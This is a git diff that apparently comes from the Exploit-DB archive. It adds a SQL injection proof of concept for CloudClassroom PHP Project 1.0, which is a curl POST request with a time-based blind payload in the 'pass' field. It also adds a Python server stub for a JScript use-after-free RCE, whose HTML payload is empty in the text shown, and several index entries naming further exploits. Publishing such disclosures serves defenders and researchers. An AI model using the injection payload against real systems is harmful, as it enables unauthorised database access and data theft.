b/exploits/php/webapps/52314.txt @@ -0,0 +1,22 @@ +# Exploit Title: CloudClassroom PHP Project 1.0 - SQL Injection +# Google Dork: inurl:CloudClassroom-PHP-Project-master +# Date: 2025-05-30 +# Exploit Author: Sanjay Singh +# Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project +# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip +# Version: 1.0 +# Tested on: XAMPP on Windows 10 / Ubuntu 22.04 +# CVE : CVE-2025-45542 + +# Description: +# A time-based blind SQL injection vulnerability exists in the pass parameter +# of the registrationform endpoint. An attacker can exploit this issue by sending +# a malicious POST request to delay server response and infer data. + +# PoC Request (simulated using curl): + +curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \ + -H "Content-Type: application/x-www-form-urlencoded" \ + -d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=testing@example.com&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub=" + +# The server response will be delayed if the SQL condition is true, confirming the injection point. \ No newline at end of file diff --git a/exploits/windows/remote/52315.py b/exploits/windows/remote/52315.py new file mode 100755 index 000000000..b3d913f11 --- /dev/null +++ b/exploits/windows/remote/52315.py @@ -0,0 +1,108 @@ +#!/usr/bin/env python3 +# Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE) +# Exploit Author: Mohammed Idrees Banyamer +# Instagram: @@banyamer_security +# GitHub: https://github.com/mbanyamer +# Date: 2025-05-31 +# CVE: CVE-2025-30397 +# Vendor: Microsoft +# Affected Versions: Windows Server 2025 (build 25398 and prior) +# Tested on: Windows Server 2025 + IE11 (x86) +# Type: Remote +# Platform: Windows +# Vulnerability Type: Use-After-Free (JScript Engine) +# Description: This PoC exploits a Use-After-Free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution. + +# ============================ +# Usage Instructions: +# +# 1. Save this script as `exploit_server.py`. +# 2. Run it with Python 3: +# $ python3 exploit_server.py +# 3. On the vulnerable target (Windows Server 2025 + IE11): +# Open Internet Explorer and navigate to: +# http://:8080/poc_cve_2025_30397.html +# +# If the target is vulnerable, calc.exe will be executed. +# ============================ + +import http.server +import socketserver + +PORT = 8080 + +HTML_CONTENT = b""" + + + + PoC - CVE-2025-30397 + + + +

Exploit PoC: CVE-2025-30397

+

Author: Mohammed Idrees Banyamer

+

Instagram: @banyamer_security

+

GitHub: mbanyamer

+

This demonstration is for ethical testing only. Triggering the vulnerability on vulnerable Internet Explorer installations will lead to execution of calc.exe via shellcode.

+ + +""" + +class Handler(http.server.SimpleHTTPRequestHandler): + def do_GET(self): + if self.path == '/' or self.path == '/poc_cve_2025_30397.html': + self.send_response(200) + self.send_header("Content-type", "text/html") + self.send_header("Content-length", str(len(HTML_CONTENT))) + self.send_header("X-Content-Type-Options", "nosniff") + self.send_header("X-Frame-Options", "SAMEORIGIN") + self.send_header("Content-Security-Policy", "default-src 'self'") + self.send_header("Cache-Control", "no-cache, no-store, must-revalidate") + self.send_header("Pragma", "no-cache") + self.send_header("Expires", "0") + self.end_headers() + self.wfile.write(HTML_CONTENT) + else: + self.send_error(404, "File Not Found") + +def run(): + print(f"Serving PoC on http://0.0.0.0:{PORT}/poc_cve_2025_30397.html") + with socketserver.TCPServer(("", PORT), Handler) as httpd: + try: + httpd.serve_forever() + except KeyboardInterrupt: + print("\nServer stopped.") + +if __name__ == "__main__": + run() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index aea095c41..efa451980 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9268,6 +9268,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47708,exploits/macos/local/47708.txt,"macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache",2019-11-22,"Google Security Research",local,macos,,2019-11-22,2019-11-22,1,,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1929 47400,exploits/macos/local/47400.md,"macOS 18.7.0 Kernel - Local Privilege Escalation",2019-09-19,A2nkF,local,macos,,2019-09-19,2019-09-19,0,,,,,,https://github.com/A2nkF/macOS-Kernel-Exploit/tree/81765a91cd299b6c05fd3edf7afe557405c949fa 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,,2020-05-12,2020-05-12,0,,,,,, +52316,exploits/macos/local/52316.py,"macOS LaunchDaemon iOS 17.2 - Privilege Escalation",2025-06-05,"Mohammed Idrees Banyamer",local,macos,,2025-06-05,2025-06-05,0,CVE-2025-24085,,,,, 43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,0,,Local,,,http://www.exploit-db.commurus-1.4.11.zip,https://m4.rkw.io/blog/murus-firewall-1411-escalation-hihack--root-privesc.html 41854,exploits/macos/local/41854.txt,"Proxifier for Mac 2.17/2.18 - Privesc Escalation",2017-04-11,"Mark Wadham",local,macos,,2017-04-11,2017-04-12,0,CVE-2017-7643,Local,,,,https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html 41853,exploits/macos/local/41853.txt,"Proxifier for Mac 2.18 - Multiple Vulnerabilities",2017-04-11,Securify,local,macos,,2017-04-11,2017-04-11,0,,,,,,https://www.securify.nl/advisory/SFY20170401/multiple_local_privilege_escalation_vulnerabilities_in_proxifier_for_mac.html @@ -10622,6 +10623,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31921,exploits/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",remote,multiple,,2008-06-16,2014-02-26,1,CVE-2008-2822;OSVDB-46155,,,,,https://www.securityfocus.com/bid/29749/info 32167,exploits/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,remote,multiple,,2008-08-05,2014-03-11,1,CVE-2008-3494;OSVDB-47517,,,,,https://www.securityfocus.com/bid/30541/info 52305,exploits/multiple/remote/52305.py,"ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation",2025-05-25,LiquidWorm,remote,multiple,,2025-05-25,2025-05-25,0,CVE-n/a,,,,, +52317,exploits/multiple/remote/52317.txt,"ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)",2025-06-05,LiquidWorm,remote,multiple,,2025-06-05,2025-06-05,0,CVE-n/a,,,,, 25019,exploits/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,CVE-2004-1256;OSVDB-12426,,,,,https://www.securityfocus.com/bid/12019/info 25018,exploits/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12018/info 32382,exploits/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",remote,multiple,,2008-09-15,2014-03-20,1,CVE-2008-7012;OSVDB-48242,,,,,https://www.securityfocus.com/bid/31178/info @@ -10742,6 +10744,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9994,exploits/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",remote,multiple,,2009-11-08,,1,,,,,, 9995,exploits/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",remote,multiple,,2009-11-08,,1,,,,,, 27095,exploits/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - 'Sample Script cal2.jsp?time' Cross-Site Scripting",2006-01-16,"Oliver Karow",remote,multiple,,2006-01-16,2013-07-25,1,CVE-2006-0254;OSVDB-22458,,,,,https://www.securityfocus.com/bid/16260/info +52318,exploits/multiple/remote/52318.py,"Apache Tomcat 10.1.39 - Denial of Service (DoS)",2025-06-05,"Abdualhadi khalifa",remote,multiple,,2025-06-05,2025-06-05,0,CVE-2025-31650,,,,, 20131,exploits/multiple/remote/20131.txt,"Apache Tomcat 3.1 - Path Revealing",2000-07-20,"ET LoWNOISE",remote,multiple,,2000-07-20,2012-07-31,1,CVE-2000-0759;OSVDB-674,,,,,https://www.securityfocus.com/bid/1531/info 33379,exploits/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,remote,multiple,,2009-09-02,2014-05-16,1,,,,,,https://www.securityfocus.com/bid/37149/info 21492,exploits/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree",2002-05-29,"Richard Brain",remote,multiple,,2002-05-29,2017-07-11,1,CVE-2002-2007;OSVDB-13304,,,,,https://www.securityfocus.com/bid/4878/info @@ -11000,6 +11003,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2018-01-11,1,CVE-2014-5380;OSVDB-110460,,,,,https://www.securityfocus.com/bid/69390/info 39293,exploits/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2016-01-22,1,CVE-2014-5381;OSVDB-110456,,,,,https://www.securityfocus.com/bid/69390/info 52303,exploits/multiple/remote/52303.py,"Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow",2025-05-25,Pepelux,remote,multiple,,2025-05-25,2025-05-25,0,CVE-2022-2070,,,,, +52313,exploits/multiple/remote/52313.py,"Grandstream GSD3710 1.0.11.13 - Stack Overflow",2025-06-05,Pepelux,remote,multiple,,2025-06-05,2025-06-05,0,CVE-2022-2025,,,,, 33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple,,2009-09-02,2014-05-06,1,CVE-2008-6992;OSVDB-48910,,,,,https://www.securityfocus.com/bid/36209/info 38049,exploits/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,remote,multiple,,2012-11-23,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/56662/info 31912,exploits/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",remote,multiple,,2014-04-09,2014-04-09,0,CVE-2008-7170;OSVDB-53482,,,,,https://www.securityfocus.com/bid/29718/info @@ -16131,6 +16135,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 11162,exploits/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",webapps,php,,2010-01-15,,1,OSVDB-61811,,,,, 47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,,2019-10-25,2019-10-25,0,CVE-2019-18418,,,,, 30070,exploits/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",webapps,php,,2007-05-22,2013-12-06,1,,,,,,https://www.securityfocus.com/bid/24101/info +52314,exploits/php/webapps/52314.txt,"CloudClassroom PHP Project 1.0 - SQL Injection",2025-06-05,"Sanjay Singh",webapps,php,,2025-06-05,2025-06-05,0,CVE-2025-45542,,,,, 19549,exploits/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",webapps,php,,2012-07-03,2012-07-03,0,OSVDB-83690,,,,, 19600,exploits/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,webapps,php,,2012-07-05,2012-07-05,0,OSVDB-84678;OSVDB-84677;OSVDB-84676;OSVDB-84675;OSVDB-84674;OSVDB-84673,,,,,https://www.vulnerability-lab.com/get_content.php?id=574 12423,exploits/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,webapps,php,,2010-04-26,,1,OSVDB-64098;CVE-2010-1660,,,,, @@ -44745,6 +44750,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 2355,exploits/windows/remote/2355.pm,"Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",remote,windows,445,2006-09-12,,1,OSVDB-27845;CVE-2006-3439;MS06-040,"Metasploit Framework (MSF)",,,, 47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)",2019-10-29,"Thomas Zuk",remote,windows,,2019-10-29,2020-12-11,0,CVE-2015-0008,,,,, 47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)",2019-10-29,"Thomas Zuk",remote,windows,,2019-10-29,2020-12-11,0,CVE-2015-0009,,,,, +52315,exploits/windows/remote/52315.py,"Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)",2025-06-05,"Mohammed Idrees Banyamer",remote,windows,,2025-06-05,2025-06-05,0,CVE-2025-30397,,,,, 28482,exploits/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)",2013-09-23,Metasploit,remote,windows,,2013-09-23,2013-09-23,1,CVE-2013-0810;OSVDB-97136;MS13-071,"Metasploit Framework (MSF)",,,, 46220,exploits/windows/remote/46220.txt,"Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution",2019-01-22,"Eduardo Braun Prado",remote,windows,,2019-01-22,2019-01-22,0,,,,,, 34931,exploits/windows/remote/34931.c,"Microsoft Windows Vista - 'lpksetup.exe oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",remote,windows,,2010-10-25,2014-10-10,1,,,,,,https://www.securityfocus.com/bid/44414/info